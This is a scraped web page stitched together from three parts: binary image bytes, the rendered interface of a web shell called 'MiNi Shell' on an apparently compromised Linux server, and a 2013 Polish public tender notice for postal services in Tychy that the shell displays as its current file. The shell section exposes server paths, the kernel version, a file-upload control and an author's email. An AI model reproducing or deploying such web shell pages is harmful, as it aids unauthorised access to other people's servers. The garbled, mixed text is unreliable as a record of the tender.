JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131203/496320-N-2013.html

<p class="kh_header"><b>Tychy: ŚWIADCZENIE USŁUG POCZTOWYCH  DLA MIEJSKIEGO ZARZĄDU BUDYNKÓW 
      MIESZKALNYCH W TYCHACH</b><br>
<b>Numer ogłoszenia: 496320 - 2013; data zamieszczenia: 03.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG POCZTOWYCH  DLA MIEJSKIEGO ZARZĄDU BUDYNKÓW 
      MIESZKALNYCH W TYCHACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym 
i zagranicznym w zakresie przyjmowania, przemieszczania i doręczania przesyłek, oraz ewentualnych zwrotów przesyłek niedoręczonych, w rozumieniu ustawy -  Prawo Pocztowe z dnia 23 listopada 2012 r. (Dz. U. z dnia 29 grudnia 2012 r. , poz. 1529), w szczególności:            

1)	odbiór, przyjmowanie, przemieszczanie i doręczanie krajowych przesyłek listowych        
      zwykłych ekonomicznych , poleconych ekonomicznych oraz  ekonomicznych za  
      potwierdzeniem odbioru (ZPO), o wadze:
a)   do 350 gram    (GABARYT  A)
b)   od  ponad 1000  ÷  2000 gram  (GABARYT  B)

GABARYT  A  -  to przesyłka o wymiarach:  
Minimum   -  wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm,
Maksimum -  żaden z wymiarów nie może przekroczyć:  wysokości 20 mm, długości 325 mm,  szerokość 230 mm,   

GABARYT  B   to przesyłka o wymiarach:  
Minimum  -  jeśli choć jeden z wymiarów przekracza wysokość 20 mm lub długość 325 mm 
lub szerokość 230 mm, 
Maksimum  -  suma długości, szerokości i wysokości 900 mm, przy czym największy z tych   
wymiarów (długość) nie może przekroczyć 600 mm.   

2)	odbiór, przyjmowanie, przemieszczanie i doręczanie zagranicznych przesyłek listowych        
      poleconych ekonomicznych , poleconych priorytetowych, o wadze:
a)   do 50 gram  
b)   od ponad 50 gram  ÷ 100 gram  

3)	Zamawiający  we własnym zakresie dostarcza korespondencję do placówek zdawczo 
      odbiorczych wykonawcy.

2.	Szczegółowy podział przedziałów wagowych przesyłek zawiera formularz oferty cenowej         
      stanowiący załącznik nr 1a do SIWZ. 

3.	Zamawiający będzie nadawał przesyłki w stanie uporządkowanym według kategorii 
      rodzajowej  i wagowej. 

4.	Przesyłki rejestrowane nadawane będą na podstawie wykazu listów  poleconych.  
 
5.	Przesyłki nierejestrowane nadawane będą na podstawie wykazu nadanych przesyłek. 

6.	Wykazy przesyłek rejestrowanych i nierejestrowanych sporządzane będą w dwóch 
      egzemplarzach po jednym dla wykonawcy i zamawiającego.

7.	Zamawiający zamieszcza w sposób trwały i czytelny informacje jednoznacznie 
       identyfikujące adresata i nadawcę, jednocześnie określając rodzaj przesyłki (zwykła, 
       polecona) na stronie adresowej przesyłki oraz zamieszcza w miejscu przeznaczonym na 
       znak opłaty pocztowej oznaczenia potwierdzającego wniesienie opłaty za usługę w postaci 
       napisu, nadruku lub odcisku pieczęci o treści wskazanej przez wykonawcę.

8.	Wykonawca zobowiązuje się do przekazania Zamawiającemu wszelkich oznaczeń 
      przesyłek rejestrowanych. 

9.	Wykonawca będzie  doręczał zamawiającemu pokwitowane przez adresata potwierdzenie 
      odbioru przesyłki niezwłocznie po doręczeniu przesyłki. W przypadku nieobecności 
      adresata, przedstawiciel Wykonawcy pozostawia zawiadomienie o próbie doręczenia 

      przesyłki (awizo) ze wskazaniem, gdzie i kiedy adresat może odebrać przesyłkę w terminie 
      7 kolejnych dni, licząc od dnia następnego po dniu zostawienia zawiadomienia u adresata. 
      Jeżeli adresat nie zgłosi się po odbiór przesyłki w w/w terminie, wykonawca sporządza 
      powtórne zawiadomienie o możliwości jej odbioru w terminie kolejnych 7 dni. Po upływie 
      terminu odbioru przesyłka niezwłocznie zwracana jest Zamawiającemu. 

10.	Zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 9 stycznia 2004 r. w sprawie 
      warunków wykonywania powszechnych usług pocztowych (Dz. U. Nr 5, poz. 34 z późn. zm.) 
      Operator (wykonawca) powinien posiadać odpowiednią ilość placówek zdawczo-
      odbiorczych. Placówki winny być czynne co najmniej przez 5 dni w tygodniu. 

11.	Wykonawca (Operator) zobowiązuje się doręczyć przesyłki listowe krajowe przyjęte do
      przemieszczenia i doręczenia: 
      -  w dniu następnym jednak nie później niż w 4 dniu po dniu nadania w przypadku przesyłki
           listowej najszybszej kategorii, 
         -   w dniu następnym jednak nie później niż w 6 dniu po dniu nadania w przypadku przesyłki 
              nie będącej przesyłką najszybszej kategorii.

12.	Przyjmowanie, przemieszczanie i doręczanie przesyłek wykonywane będzie zgodnie z 
      przepisami określonymi w:
1)	Ustawie z dnia 23 listopada 2012 r.- Prawo Pocztowe (Dz. U. z 2012 r., poz. 1529) 
2)	Rozporządzeniu Ministra Infrastruktury z dnia 13 października 2003 r. w sprawie reklamacji 
     powszechnej usługi pocztowej w zakresie rejestrowanej i przekazu pocztowego ( Dz. U. 
     Nr 183, poz. 1795  z 2003 r. z późn. zm.)
3)	 Rozporządzeniu Ministra Administracji i Cyfryzacji w sprawie warunków wykonywania usług
     powszechnych przez operatora wyznaczonego  (Dz. U. z 2013 r. poz. 545)     
4)	Międzynarodowych przepisach pocztowych: ratyfikowana umowa międzynarodowa 
    ogłoszona w dniu 8 listopada 2007 r. : Umowa międzynarodowa siódmy protokół dodatkowy 
    do Konstytucji Światowego Związku Pocztowego, Regulamin Generalny Światowego 
    Związku Pocztowego wraz z załącznikiem - Regulaminem wewnętrznym Kongresów , 
    Światowa Konwencja Pocztowa oraz Porozumienie dotyczące pocztowych usług płatniczych 
    (Dz. U. Nr 206 z 2007 r., poz. 1494), Regulamin Poczty Listowej (Dz. U. nr 108 poz. 744 z 
    2007 r.), Regulamin dotyczący Paczek pocztowych (Dz. U. nr 108 poz. 745 z dnia 21 
    czerwca 2007 roku) w przypadku usług pocztowych w obrocie zagranicznym)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia 
     z wolnej ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na 
     zasadach określonych w art. 67 ust.1. pkt 6) ustawy - Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 22.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualnego zaświadczenia o wpisie do rejestru operatorów pocztowych prowadzonego
      przez  Prezesa Urzędu Komunikacji Elektronicznej na wykonywanie działalności 
      pocztowej w zakresie przyjmowania, przemieszczania i doręczania przesyłek w obrocie 
      krajowym i zagranicznym zgodnie z art. 6 ust. 1 ustawy z dnia 23 listopada 2012 r. 
      Prawo pocztowe (Dz. U. 2012. 1529). 

     (W przypadku podmiotów występujących wspólnie warunek ten może spełniać co najmniej 
      jeden z wykonawców).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy - PZP), Zamawiający wymaga złożenia następujących dokumentów: 
1)	 wykazu wykonanych, a przypadku świadczeń okresowych lub ciągłych również  
           wykonanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu 
          składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, 
          wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których 
          usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są 
            wykonywane należycie.

    Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że w okresie 
    ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia 
    działalności jest krótszy -  w tym okresie, należycie wykonał /wykonuje : 
          co najmniej jedną usługę (zrealizowaną/realizowaną w ramach jednej umowy) 
          polegającą na świadczeniu usług pocztowych w zakresie przyjmowania, 
          przemieszczania, doręczania przesyłek listowych, o wartości min. 70 000,00 zł  (brutto) 

  lub

          co najmniej dwie usługi (zrealizowane/ realizowane w ramach dwóch odrębnych 
          umów) polegające na świadczeniu usług pocztowych w zakresie przyjmowania, 
          przemieszczania, doręczania przesyłek listowych (zrealizowane/realizowane w ramach 
          dwóch odrębnych umów)  o wartości min. 35 000,00 zł (brutto) - każda  z usług

2)	 Do wykazu należy dołączyć dowody, czy ww. usługi  zostały wykonane lub są 
          wykonywane należycie.

          Dowodami, o których mowa powyżej są:
a)	 poświadczenie, z tym że  w odniesieniu do nadal wykonywanych usług okresowych lub
     ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem 
     terminu składania ofert
b)	 oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
     wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a)

         W przypadku, gdy zamawiający jest podmiotem , na rzecz którego usługi wskazane 
         w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania 
     poświadczeń, o których mowa powyżej.

         Zgodnie z  § 9 ust. 2 rozporządzenia , w postępowaniach o udzielenie zamówienia 
         wszczynanych w okresie 12 miesięcy od dnia wejścia w życie rozporządzenia, wykonawca 
         w miejsce poświadczeń , o których mowa w § 1 ust. 2 pkt 1 może przedkładać dokumenty 
         potwierdzające należyte wykonanie usług , określone w § 1  ust. 1 pkt 3) rozporządzenia 
         Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, 
         jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą 
         być składane ( Dz. U. Nr 226 poz. 1817)


         Wykaz usług należy sporządzić wg wzoru druku stanowiącego załącznik nr 3 do SIWZ     

         (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
         spełniać łącznie lub co najmniej jeden z wykonawców ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-   Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku 
          udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-   Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku 
          udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-   Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku 
          udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego załącznik nr 1 do SIWZ
2)	wypełniony i podpisany formularz oferty cenowej - sporządzony wg wzoru druku stanowiącego załącznik nr 1a do SIWZ
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2013 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com